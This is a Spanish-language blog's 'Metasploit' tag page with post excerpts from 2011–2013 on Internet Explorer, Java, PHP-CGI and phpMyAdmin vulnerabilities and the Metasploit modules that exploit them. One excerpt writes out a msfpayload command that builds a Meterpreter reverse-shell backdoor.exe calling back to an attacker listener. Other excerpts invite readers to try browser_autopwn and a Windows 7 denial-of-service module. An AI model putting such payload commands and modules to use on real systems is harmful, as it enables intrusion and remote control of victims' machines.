Mostrando entradas con la etiqueta Metasploit. Mostrar todas las entradas
Mostrando entradas con la etiqueta Metasploit. Mostrar todas las entradas

1 oct. 2013

Exploit en todas las versiones de Internet Explorer (CVE-2013-3893) [Explotación con MSF]


Recientemente se ha hecho publico un Exploit que inicialmente fue descubierto en acción en Japón, pero el estudio de éste lo propagó rápidamente a otras partes (CVE-2013-3893), hasta el momento no ha salido un parche oficial por parte de Microsoft y afecta a Internet Explorer desde la versión 6 a la 11 lo que lo transforma en altamente riesgoso para la integridad de nuestros sistemas.

Se trata de una vulnerabilidad Use-after-free en el SetMouseCapture implementado en mshtml.dll, atacantes remotos pueden ejecutar código arbitrario mediante strings en JavaScrip.

5 sept. 2013

2 Nuevos Bugs en Java 7 (Videos MSF) [storeImageArray & Applet ProviderSkeleton]


Nuevamente han salido a la luz 2 vulnerabilidades, la primera CVE-2013-2465 Java storeImageArray Vulnerability que afecta a Java versiones 7 update 21 y anteriores, Java versiones 6 update 45 y anteriores. La segunda CVE-2013-2460 Java Applet ProviderSkeleton Vulnerability afecta a Java versiones 7 Update 21 y anteriores.

20 abr. 2013

Nuevo Bug en Java 7u17 (Video MSF) [Applet Reflection Type Confusion RCE]



Pareciera ser que Java no ha podido salir del hoyo en el que ha caído después de descubrirse un 0day tras otro, y como si no fuera suficiente nuevamente ha salido a la luz una nueva vulnerabilidad que afecta a Java versiones 7 update 17 y anteriores. 

Fue descubierta por Jeroen Frijters que la publicó el 17-04-2013, recientemente (el 20-04-2013) Metasploit a proporcionado un módulo que explota dicha vulnerabilidad.

26 feb. 2013

Otro 0day en Java permite Ejecución de Código Remoto (Video MSF)

Hace más de un mes que se publicó un Grave 0day en Java que permitía la Ejecución de Código Remoto. Lo cual fue noticia mundial ya que grandes empresas como Apple recomendaron dejar de usar Java, e incluso el gobierno de EEUU llamó a desinstalar por completo Java, ya que era una amenaza real y latente que se dilató en parchar.

Recientemente (18-01-2013) fue descubierta una nueva vulnerabilidad (CVE-2013-0431 Java Applet JMX Remote Code Execution) que es muy parecida a la anterior (incluso parece ser una secuela) que nuevamente afecta al SandBox.

22 feb. 2013

Cómo Instalar Metasploit en iOS 6.1 (Video)


Si tienes un Ipad o un Iphon este vídeo te puede interesar. Recientemente Japtron (Gracias por su contribución) me ha enviado un vídeo donde explica fácilmente como instalar Metasploit en un dispositivo con iOS 6.1

Sin más que decir les dejo con el vídeo:

24 ene. 2013

2 Graves vulnerabilidades en Java permite Ejecución de Código Remoto, Java Applet AverageRangeStatisticImpl & Method Handle (Videos MSF)

Hace muy poco que se había descubierto un Grave 0day en Java que permitía a un atacante tomar el control de un sistema, esto trajo muchos inconvenientes tanto por parte de Oracle como de los usuarios de Java, llego el punto en que se recomendó por parte del gobierno de EE.UU a desactivar Java o simplemente eliminarlo por los potenciales perjuicios a los sistemas con Java corriendo.

Otro problema fue la tardanza de un parche oficial por parte de Java, pero tan rápido como salió el parche arreglando el 0day, aparecieron voces diciendo que no estaba bien parchado y que aun era posible explotar el bug. A todos estos inconvenientes sumemosle el hecho de que se empezaron a comercializar por internet 2 nuevas vulnerabilidades en Java...

10 ene. 2013

Grave 0day en Java permite Ejecución de Código Remoto (Video MSF)

Recientemente (PoC proporcionado el 10/01/2013) se ha detectado un (muy) grave 0day en Oracle Java SE 7 Update 10, que es la última versión disponible de Java. Lo que lo hace muy peligroso para todos los usuarios de Windows, Linux y Mac, ya que no existe parche alguno que arregle esta vulnerabilidad.

El alcance de esta vulnerabilidad es crítica ya que la mayoría (por no decir todos) de los computadores tienen instalado Java por los beneficios que nos proporciona. Lo que lo transforma en un 0day muy peligroso y muy codiciado por los potenciales atacantes, es más, en estos momentos ya se está usando para fines malicioso, por lo demás, pronto será parchado y si quieren sacarle provecho más vale que lo hagan pronto.

31 dic. 2012

Grave 0-Day en Internet Explorer 6, 7 y 8 Vulnerabilidad CDwnBindInfo [Video MSF]

Se ha detectado un grave 0day en Internet Explorer versiones 6, 7 y 8. El día miércoles 26 de diciembre CFR.org ha sido víctima de un ataque mal intencionado, ataque en el cual los visitantes que usaban Internet Explorer eran infectados por un nuevo 0Day. Ya se tenia registro de esta vulnerabilidad desde el 7 de Diciembre, pero fue gracia a lo ocurrido en CFR.org que binjo, Eric Romang y FireEye han realizado unos acuciosos análisis, y desde ayer que se tiene un módulo funcional en Metasploit que explota este fallo.

Este módulo se aprovecha de un fallo que ocurre cuando el objeto CDwnBindInfo es liberado por FollowHyperlink2, pero una referencia se mantiene en CDOC. Como resultado, cuando se usa la referencia durante la recarga de la página, se puede manipular una parte de la memoria, dando paso así a poder ejecutar código arbitrario.

17 nov. 2012

Java Applet JAX-WS Remote Code Execution [Explotando con MSF + Vídeo]

Recientemente se ha publicado una nueva vulnerabilidad en Java, denominada Java Applet JAX-WS Remote Code Execution descubierta por @_juan_vazquez_ la cual afecta a la versión 1.7.0_07-b10 y anteriores.

El exploit respectivo para aprovecharse de esta vulnerabilidad se encuentra respectivamente en los modulos de Metasploit y se puede utilizar con tal solo realizar un msfupdate.

El modulo disponible en Metasploit para esta vulnerabilidad se aprovecha de los JAX-WS classes desde un Java Applet para ejecutar código arbitrario Java.

Los procedimientos y requerimientos para explotar esta vulnerabilidad son muy simples, solo basta con tener BackTrack y un Sistema Virtual para realizar las pruebas.

31 oct. 2012

[Browser Autopwn desde Metasploit] Vulnerando Windows 7-XP (IE 0-day)


En esta pequeña entrada se describirá como utilizar el modulo browser_autopwn incluida en el Metasploit, la cual nos permitirá explotar cualquier tipo de vulnerabilidad que afecten a los navegadores webs, obteniendo asi una session meterpreter en el sistema vulnerable.

Metasploit ofrece la posibilidad de lanzar exploits de acuerdo a la versión del browser que la victima este utilizando, por ejemplo cuando utilizemos el modulo browser_autopwn esta buscara todos los exploits respectivos para cualquier tipo de navegador, ya sea Internet Explorer, Google Chorme, Firefox u Opera, de manera que cuando la victima ejecute el link generado, esta automaticamente se aproveche de la vulnerabilidad encontrada.

Por otro lado, para acceder a cualquier Sistema Windows 7 o XP nos basaremos en la ultima vulnerabilidad 0-day que se registro en el Navegador Internet Explorer versiones 7 - 8 y 9 la cual permite que cualquier 'atacante' puede utilizar el exploit respectivo para tomar acceso completo al sistema.

25 oct. 2012

Explotando Windows 7-XP mediante PDF Escape desde Metasploit





En la actualidad como mucho de nosotros sabemos, la mayoría de las personas optan por usar el famosillo Sistema Operativo Windows, ya sea XP - 7 o la nueva que se lanzo hace poco el Windows 8, entonces es lógico que si usan Windows es por cosas de trabajo, estudio, diversión  etc. 

También es de conocimiento que Windows actualmente es vulnerable a cualquier ataque cibernetico, ya sea mediante exploits, vulnerabilidades, troyanos, etc, es por ello que muchos preferimos usar cualquier otro sistema que no sea Windows.

Pero ustedes se preguntaran ¿Porque Windows es tan Vulnerable?... Pues, porque nosotros mismos lo hacemos vulnerable!!! entonces ustedes dirán !Joder que Coña! si mis Firewall, Antivirus están actualizados! ... pues eso no tiene nada que ver, porque el sistema es explotado mediante las vulnerabilidades que tienen los programas que acostumbran a instalar diariamente, por ejemplo el  Adobe PDF, Microsoft Word, Ares, Reproductor de Windows, Winamp, VLC u otros, ¿Por que creen que las empresas actualizan sus Softwares (programas que usamos) semanalmente?... Porque, no es porque les guste... es con el fin de parchear las vulnerabilidades que se presentan diariamente en estos programas, y así "ayudan" a que el sistema sea un poco "seguro".

26 sept. 2012

BackDoor en phpMyAdmin [Vídeo explotación con Metasploit]

Recientemente se ha publicado un error de seguridad en phpMyAdmin, aunque en realidad el error de seguridad fue provocado por unos de los servidores de descarga de SourceForge.

El Mirror de descargas cdnetworks-kr-1 de SourceForge fue comprometido por atacantes malintencionados, quienes modificaron el fichero de descarga phpMyAdmin-3.5.2.2-all-languages.zip agregándole 2 archivos maliciosos que cumplen con el rol de Backdoor en el sistema, específicamente el archivo server_sync.php es el que permite a un atacante ejecutar remotamente código PHP.

A pesar de que recién ayer fue confirmada la vulnerabilidad, Metasploit ya hizo su trabajo (como siempre) y ya existe el módulo que explota este bug.

Aquí les dejo el vídeo de como explotar CVE-2012-5159 phpMyAdmin 3.5.2.2 server_sync.php Backdoor con Metasploit:

20 sept. 2012

Grave 0-Day en Internet Explorer (Vídeo MSF)

Hace ya un par de días que se hizo pública una grave vulnerabilidad 0-Day que afecta Internet Explorer que puede ser explotada por atacantes cuando se hace uso del objeto CMshtmlEd.

Para infectar a un sistema simplemente basta con que el usuario use Internet Explorer y visite una web infectada con el código malicioso. Afecta a las versiones 7, 8 y 9 de Internet Explorer y no se conoce restricción de Sistema Operativo (ha sido probado con éxito en Windows XP, Vista, 7 e inclusive  Windows 8)

Ya está disponible el módulo de Metasploit que se aprovecha de esta vulnerabilidad, por lo cual se debe simplemente actualizar Metasploit para gozar de él.

Vídeo explotación con MSF:

28 ago. 2012

[Exploit MSF + Vídeo] Vulnerabilidad 0day Java 7 Applet Remote Code Execution

Ayer anunciábamos que se había descubierto una grave vulnerabilidad en Java para la que aun no existe parche,pues bueno, hoy con más tiempo les quiero dejar con el Módulo para Metasploit del cual ya pueden gozar actualizando MSF, que aprovecha el fallo para obtener una sesión Meterpreter que ha sido probado con éxito en los siguientes entornos:

  • Mozilla Firefox en Ubuntu Linux 10.04
  • Internet Explorer / Mozilla Firefox / Chrome en Windows XP
  • Internet Explorer / Mozilla Firefox en Windows Vista
  • Internet Explorer / Mozilla Firefox en Windows 7
  • Safari en OS X 10.7.4

Aquí les dejo el vídeo demostrativo:

16 may. 2012

[Vídeo] Nuevas funcionalidades de Armitage

Cuando salió Armitage, escribí sobre él y eso fue hace más de un año... Hoy por hoy ésta herramienta, que hace aun más fácil y gráfico el uso de Metasploit, tiene muchas más utilidades y mejoras. Tiempo atrás se tenía que instalar manualmente para usarlo, hoy viene por defecto con MSF.

Es así que  les quiero dejar un vídeo para que vean algunas de las nuevas características, y para que los que no lo conocen comiencen a familiarizarse con él. 

En el vídeo se muestra 10 clientes obtenidos con Armitage después de la explotación de un servidor remoto, se ven diferentes funcionalidades de Armintage y al final del vídeo se muestra lo fácil que es la gestión de una base de datos con 5.000 hosts a través de esta aplicación.

6 may. 2012

Grave vulnerabilidad en PHP-CGI permite ejecutar código remoto en Apache

Las sitios afectados son servidores web con PHP ejecutándose como CGI.

Eindbazen, un equipo de competiciones CTF, ha descubierto una vulnerabilidad en PHP-CGI (CVE-2012-1823) que permite pasar parámetros al intérprete de PHP, como -s o -r, a través de la URL. Por ejemplo añadiendo la cadena '?-s'.


Como resultado de la inyección de estos parámetros en la URL, se puede mostrar el contenido de archivos de código fuente (que puede incluir información confidencial como, por ejemplo, contraseñas de BBDD) o ejecutar código PHP arbitrario.

23 feb. 2012

[Vídeo Metasploit] Intrusión en Linux ejecutando con Wine un payload.exe

Me encontré por Internet con un vídeo donde con Metasploit usan el comando msfpayload para crear  un backdoor (payload) extrañamente echo para Windows, pero para infectar a un sistema Linux. La súper ingeniosa técnica trata de ejecutar el *.exe con Wine. Aunque parezca trivial esto, puede ser muy útil si otras formas de intrusión fallan.


Para crear el Backdoor:
root@bt:~# msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.12 lport=4444 X > backdoor.exe

Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: {"lhost"=>"192.168.1.12", "lport"=>"4444"}

28 nov. 2011

[Video Metasploit] Ataque DoS en Window 7


Bueno, este video lo posteo para que practiquen con Metasploit y de manera "entretenida", es muy fácil de llevar a cabo. Y trata esencialmente de una vulnerabilidad para "dejar pegado" Windows 7.

Este módulo se aprovecha de una falla de denegación de servicio en el cliente SMB de Windows 7 y Windows Server 2008 R2. Para provocar este error, este módulo se ejecuta como un servicio y fuerza a un cliente vulnerable a acceder a la IP de este sistema como un servidor SMB. Esto se puede lograr mediante la incorporación de una ruta UNC (\HOST\share\something) en una página web. La víctima tiene que acceder a la URL entregada por Metasploit usando Internet Explorer, o un documento Word.

27 oct. 2011

Metasploit en un Apple TV 2G

Xc0d3 me ha enviado un tutorial en el cual especifica como instalar y correr Metasploit en un Apple TV 2G. Apple TV es un media center que podemos conectar a nuestro televisor y a través de él acceder a diversos contenidos multimedia como fotos, películas, series, radios y vídeos en linea.

La instalación es muy parecida a la mayoría de instalaciones en un dispositivo Apple, pero nunca deja de ser util para alguien que tenga un Apple TV.


Agradezco mucho los aportes y agradezco a Xc0d3 por dedicar su tiempo.

[+] Salu2
[+] Zion3R
[+] P.D: Si quieres enviarme un Tutorial, Manual o aporte, puedes hacerlo mediante blackploit@gmail.com

2 ago. 2011

Metasploit Framework 4.0.0

Todos conocemos MSF que es por excelencia la herramienta predilecta de muchos "hackers", ha salido la versión 4.0.0 de esta excelente herramienta... La nueva versión contiene 36 nuevas vulnerabilidades, 27 nuevos módulos de post-explotación y 12 módulos auxiliares, todo ello sumado a los que ya traía la versión 3.7.1 de mayo 2011. No quiero entrar en detalles mínimos, pero dejo un video donde se presenta algunas de las nuevas características de MSF 4.0.0 mediante la interfaz Armitage.